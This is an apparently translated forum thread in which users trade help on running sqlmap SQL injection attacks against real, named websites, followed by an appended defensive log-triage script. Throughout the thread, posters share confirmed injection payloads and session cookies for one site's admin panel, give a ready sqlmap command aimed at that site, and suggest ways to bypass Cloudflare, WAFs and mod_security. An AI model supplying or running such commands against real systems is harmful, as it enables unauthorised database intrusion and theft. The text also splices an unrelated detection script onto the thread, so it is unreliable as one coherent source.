Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. Xsite

    Can anyone suggest a fix for the Cloudflare trouble? As I understand it, the injection isn't working because of it

    [12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
    [12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests
     
  2. dmax0fw

    Try passing the verification manually in a browser; Cloudflare will assign you cookies, then pass those cookies to sqlmap
     
  3. ekaterina333

    That won't help, I think the problem there is something else
     
  4. ShpillyWilly

    Try to find out the real IP and hit that directly. https://forum.antichat.ru/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/
     
  5. Xsite

  6. Golfstream

    [22:12:44] [WARNING] the web server responded with an HTTP error code (424) which could interfere with the results of the tests
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: vote (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: wp-polls-nonce=08fc675d54&vote=-6688) OR 8053=8053-- GHAp&poll_3=8&poll_3=9&poll_3=10&archive-dropdown=http://*****.**/2014/05/&poll_id=3
    ---
    [22:12:44] [INFO] the back-end DBMS is Microsoft SQL Server
    back-end DBMS: Microsoft SQL Server 2016
    [22:12:44] [INFO] fetching database names
    [22:12:44] [INFO] fetching number of databases
    [22:12:46] [INFO] retrieved:
    [22:12:46] [ERROR] unable to retrieve the number of databases
    [22:12:46] [INFO] retrieving the length of query output
    [22:12:46] [INFO] retrieved:
    [22:12:47] [INFO] retrieved:
    [22:12:47] [INFO] falling back to current database
    [22:12:47] [INFO] fetching current database
    [22:12:47] [INFO] retrieving the length of query output
    [22:12:47] [INFO] retrieved:
    [22:12:48] [INFO] retrieved:
    [22:12:48] [CRITICAL] unable to retrieve the database names
    [22:12:48] [WARNING] HTTP error codes detected during run:
    424 (?) - 24 times

    Please advise on next steps; maybe some option is missing? The DB is being blocked. I've used tamper scripts, but to no avail
     
    #606 Golfstream, 27 Jan 2018
    Last edited: 27 Jan 2018
  7. panic.ker

    Turn on -v 3 and --parse-errors and look there to see where the problem comes from. Also try --no-cast or --hex, sometimes that works. Try CHAR-encoding it.
     
  8. Sensoft

    I found a blind SQL injection on a site, but it's in the account profile
    How do I attach a session or something like that?
     
  9. BabaDook

    Have you tried setting the cookie? --cookie=".........."
     
  10. Sensoft

    No, but I'll try it now
     
  11. Sensoft

    Code:
    sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:
    ---
    Parameter: industry (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: industry=-5813 OR 1546=1546
        Vector: OR [INFERENCE]
    It didn't show the databases
    and an error also came up
    Code:
    [00:24:05] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
     
  12. Sensoft

    So judging by the error, it couldn't work out the DB type; I had MySQL set as the priority
    I've removed the priority and will take another look now
     
  13. ms13

    Yes, keep us posted
     
    ShpillyWilly and joelblack like this.
  14. Sensoft

    ok :D
     
  15. The404

    Hi everyone!
    Acunetix finds a boolean-based blind

    POST /admin/admin.php HTTP/1.1
    Content-Length: 195
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://dsm-print.ru/
    Cookie: SNS=8q3t6fosp0qb982nlqjkb8i3o2; PHPSESSID=2u4rtf0pji3cfe4bou3tnra5n7; _ym_uid=1518504918276952455;
    _ym_isad=2; _ym_visorc_44242969=w
    Host: dsm-print.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0
    Safari/537.21
    Accept: */*
    enter_admin=%c2%ee%e9%f2%e8&admin_name=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))
    OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&admin_password=g00dPa%24%24w0rD

    Help me put together the sqlmap request correctly and exploit this thing - whatever I do, modsecurity returns Error 415 Unsupported Media type
    Thanks in advance....
     
  16. BabaDook

    It's not good to work on RU sites



    sqlmap --random-agent -u 'http://dsm-print.ru/admin/admin.php' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba
    ______________________________________________________________________
    As for mod_security, here you'll have to work it by hand ))
     
  17. ms13

    yep)
    Didn't Miroslav put together modsecurityzeroversioned.py, though?
     
  18. ms13

    I don't know either... I just googled that.
    It's just that the thread is sort of about his product, so I posted it for the guys who aren't aware!)
     
  19. The404

    About RU - it's not for the sake of harm - I just really need the info - and I see half of this thread is filled with RU SQL injections anyway....
    The request didn't help - and anyway, if anything - my apologies...
     
  20. Sensoft

    I just can't exploit it because of this wretched WAF
    Code:
    [04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
    [04:59:22] [WARNING] HTTP error codes detected during run:
    400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
    [04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    Help
     
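From the defending side, the sqlmap output quoted in this thread shows two signals that are visible in server logs: integer comparisons after OR in a parameter, and a burst of 4xx responses from a single client. The following is an added example, not part of the thread, that flags both; the log format, client addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample, one request per line: "client status request-data".
# Hypothetical format and addresses; adapt parse() to the real log layout.
SAMPLE_LOG = """\
203.0.113.7 200 industry=12
203.0.113.7 200 industry=-5813 OR 1546=1546
203.0.113.7 400 industry=-5813%20OR%201546%3D1547
203.0.113.7 414 industry=-1%29+OR+8053%3D8053--+GHAp
203.0.113.7 400 industry=7
198.51.100.4 200 industry=3
198.51.100.4 404 industry=4
198.51.100.4 200 q=rock+or+pop
"""

# Boolean-based blind probes compare two integer literals after OR/AND.
TAUTOLOGY = re.compile(r"\b(?:OR|AND)\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)

def parse(line):
    client, status, data = line.split(" ", 2)
    # Decode first so URL-encoded probes match the same pattern.
    return client, int(status), unquote_plus(data)

def triage(log_text, min_requests=4, error_ratio=0.5):
    """Return {client: [reasons]} for clients showing either signal."""
    stats = defaultdict(lambda: {"total": 0, "errors": 0, "probes": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, status, data = parse(line)
        s = stats[client]
        s["total"] += 1
        s["errors"] += status >= 400
        s["probes"] += bool(TAUTOLOGY.search(data))
    flagged = {}
    for client, s in stats.items():
        reasons = []
        if s["probes"]:
            reasons.append("boolean-probe")
        # Thresholds are illustrative assumptions; tune against real traffic.
        if s["total"] >= min_requests and s["errors"] / s["total"] >= error_ratio:
            reasons.append("error-burst")
        if reasons:
            flagged[client] = reasons
    return flagged

if __name__ == "__main__":
    for client, reasons in triage(SAMPLE_LOG).items():
        print(client, ", ".join(reasons))
```

The User-Agent is deliberately not used as a signal, since the command quoted in the thread runs with --random-agent.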